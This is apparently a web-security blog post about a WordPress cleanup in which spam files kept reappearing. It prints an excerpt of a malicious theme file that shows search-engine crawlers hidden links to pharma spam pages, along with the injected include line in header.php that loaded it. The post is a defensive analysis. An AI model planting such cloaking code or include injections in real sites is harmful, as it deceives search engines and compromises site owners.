Recently we cleaned a site that had a malicious wp-page.php file at the root of the WordPress site. It was responsible for pharma spam doorways created on this site. The file was quickly located and deleted. To our surprise, when we loaded that wp-page.php in a browser to verify that the problem was resolved, the malicious content was still there. And the headers stated that it was not a cached page.
We checked the file on server – indeed it was there with a very fresh modification date. We deleted the file again and a few seconds later the file was recreated. This behavior was typical for malware that used cronjobs to reinfect sites. However, when we checked the user’s crontab, we didn’t find any suspicious cron jobs there.
We continued with a more thorough server scan and found the malicious nav.php file inside the site’s active theme. The file injected links the wp-page.php links into the legitimate site pages when they were requested either by Googlebot or Bingbot.
...$movedb = user_min_browser($_SERVER['HTTP_USER_AGENT']);$movedb2 = 'moved';if ($movedb == $movedb2){ echo '<ul>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'</a></li>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'</a></li>';...echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'</a></li>';echo '</ul>';}
But that was not the most interesting part of the file. It was also responsible for creating the wp-page.php file. We are getting closer! Just need to figure out what executes that nav.php file, since it definitely didn’t belong to the theme.
A quick scan for nav.php revealed this code in the header.php of the same theme:
<?php include 'nav.php'; ?>
Hacker injected this line into header.php to make the malicious code executed every time any public site page is being loaded. It is mainly done to feed the spam to search engine crawlers, but it also recreates the wp-page.php on every web page load even if the file still exists, which works as a “delete protection”.
This case shows that a site cleanup is not finished when you remove the malicious files you found. After the initial cleanup you should verify that the malware is gone and then continue monitoring the site, because you might have missed some backdoors, cron jobs or security holes that will help hackers reinfect your site. This may happen within seconds as we described here, or it may take days before the malware returns. Only a reliable continuous security monitoring will help you verify that the malware is gone for good or will notify you if your site gets reinfected so that you can quickly mitigate the problem and investigate why the original cleanup was not enough to prevent reinfections.